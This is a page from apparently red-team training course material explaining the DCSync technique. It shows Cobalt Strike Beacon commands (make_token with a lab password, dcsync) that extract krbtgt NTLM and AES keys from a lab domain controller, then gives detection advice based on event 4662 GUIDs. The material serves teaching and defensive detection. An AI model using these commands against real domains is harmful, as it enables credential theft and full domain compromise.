RTO
  • Getting Started
    • What is Red Teaming?
    • What is OPSEC?
    • Primum non nocere?
    • Attack Lifecycle
    • Engagement Planning
    • Post-Engagement & Reporting
  • Command & Control
    • Red Team Ops Lab
    • Cobalt Strike
    • Starting the Team Server
    • Listener Management
    • Generating Payloads
    • Interacting with Beacon
    • Pivot Listeners
    • Running as a Service
  • External Reconnaissance
    • External Reconnaissance
    • DNS Records
    • Google Dorks
    • Social Media
  • Initial Compromise
    • Initial Compromise
    • Password Spraying
    • Internal Phishing
    • Initial Access Payloads
    • Visual Basic for Applications (VBA) Macros
    • Remote Template Injection
    • HTML Smuggling
  • Host Reconnaissance
    • Host Reconnaissance
    • Processes
    • Seatbelt
    • Screenshots
    • Keylogger
    • Clipboard
    • User Sessions
  • Host Persistence
    • Host Persistence
    • Task Scheduler
    • Startup Folder
    • Registry AutoRun
    • Hunting for COM Hijacks
    • Headless Cobalt Strike
  • Host Privilege Escalation
    • Host Privilege Escalation
    • Windows Services
    • Unquoted Service Paths
    • Weak Service Permissions
    • Weak Service Binary Permissions
    • UAC Bypasses
  • Elevated Host Persistence
    • Elevated Host Persistence
    • Windows Services
    • WMI Event Subscriptions
  • Credential Theft
    • Obtaining Credential Material
    • Beacon + Mimikatz
    • NTLM Hashes
    • Kerberos Encryption Keys
    • Security Account Manager
    • Domain Cached Credentials
    • Extracting Kerberos Tickets
    • DCSync
  • Password Cracking Tips & Tricks
    • Password Cracking Tips & Tricks
    • Wordlists
    • Wordlist + Rules
    • Masks
    • Mask Length & Mask Files
    • Combinator
    • Hybrid
    • kwprocessor
  • Domain Reconnaissance
    • Domain Recon
    • PowerView
    • SharpView
    • ADSearch
  • User Impersonation
    • User Impersonation
    • Pass the Hash
    • Pass the Ticket
    • Overpass the Hash
    • Token Impersonation
    • Make Token
    • Process Injection
  • Lateral Movement
    • Lateral Movement
    • Windows Remote Management
    • PsExec
    • Windows Management Instrumentation (WMI)
    • The Curious Case of CoInitializeSecurity
    • DCOM
  • Session Passing
    • Session Passing
    • Beacon Passing
    • Foreign Listener
    • Spawn & Inject
  • Pivoting
    • SOCKS Proxies
    • Linux Tools
    • Windows Tools
    • Browsers
    • Reverse Port Forwards
    • NTLM Relaying
  • Data Protection API
    • Data Protection API
    • Credential Manager
    • Scheduled Task Credentials
  • Kerberos
    • Kerberos
    • Kerberoasting
    • ASREP Roasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Alternate Service Name
    • S4U2Self Abuse
    • Resource-Based Constrained Delegation
    • Shadow Credentials
  • Active Directory Certificate Services
    • Active Directory Certificate Services
    • Finding Certificate Authorities
    • Misconfigured Certificate Templates
    • NTLM Relaying to ADCS HTTP Endpoints
    • User & Computer Persistence
  • Group Policy
    • Abusing Group Policy
    • Modify Existing GPO
    • Create & Link a GPO
  • MS SQL Servers
    • MS SQL Servers
    • MS SQL Impersonation
    • MS SQL Command Execution
    • MS SQL Lateral Movement
    • MS SQL Privilege Escalation
  • Domain Dominance
    • Domain Dominance
    • Silver Tickets
    • Golden Tickets
    • Diamond Tickets
    • Forged Certificates
  • Forest & Domain Trusts
    • Forest & Domain Trusts
    • Parent/Child
    • One-Way Inbound
    • One-Way Outbound
  • Local Administrator Password Solution
    • Local Administrator Password Solution
    • Reading ms-Mcs-AdmPwd
    • Password Expiration Protection
    • LAPS Backdoors
  • Microsoft Defender Antivirus
    • Microsoft Defender Antivirus
    • On-Disk Detections
    • Artifact Kit
    • In-Memory Detections
    • Resource Kit
    • AMSI vs Post-Exploitation
    • Behavioural Detections
  • Application Whitelisting
    • AppLocker
    • Policy Enumeration
    • Writeable Paths
    • Living Off The Land Binaries, Scripts and Libraries
    • PowerShell CLM
    • Beacon DLL
  • Data Hunting & Exfiltration
    • Data Hunting & Exfiltration
    • File Shares
    • Databases
  • Extending Cobalt Strike
    • Extending Cobalt Strike
    • Mimikatz Kit
    • Jump & Remote-Exec
    • Beacon Object Files
    • Malleable Command & Control
Powered by GitBook
On this page
  1. Credential Theft

DCSync

The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.

This requires GetNCChanges which is usually only available to domain admins. The technique is included here for completeness, and it will be useful later on.

\

Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.

beacon> make_token DEV\nlamb F3rrari

beacon> dcsync dev.cyberbotic.io DEV\krbtgt
[DC] 'dev.cyberbotic.io' will be the domain
[DC] 'dc-2.dev.cyberbotic.io' will be the DC server
[DC] 'DEV\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

Credentials:
  Hash NTLM: 9fb924c244ad44e934c390dc17e02c3d
    ntlm- 0: 9fb924c244ad44e934c390dc17e02c3d
    lm  - 0: 207d5e08551c51892309c0cf652c353b
		
* Primary:Kerberos-Newer-Keys *
    Default Salt : DEV.CYBERBOTIC.IOkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
      aes128_hmac       (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
      des_cbc_md5       (4096) : 629189372a372fda

\

Here we have extracted the NTLM and AES keys for the krbtgt account using lamb (a domain admin).

\

OPSEC Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Find these using the "Suspicious Directory Replication" saved search in Kibana.

\

\

Replication traffic usually only occurs between domain controllers but can also be seen via applications such as Azure AD Connect. Mature organisations should baseline typical DRS traffic to find suspicious outliers.

PreviousExtracting Kerberos TicketsNextPassword Cracking Tips & Tricks

Last updated 1 year ago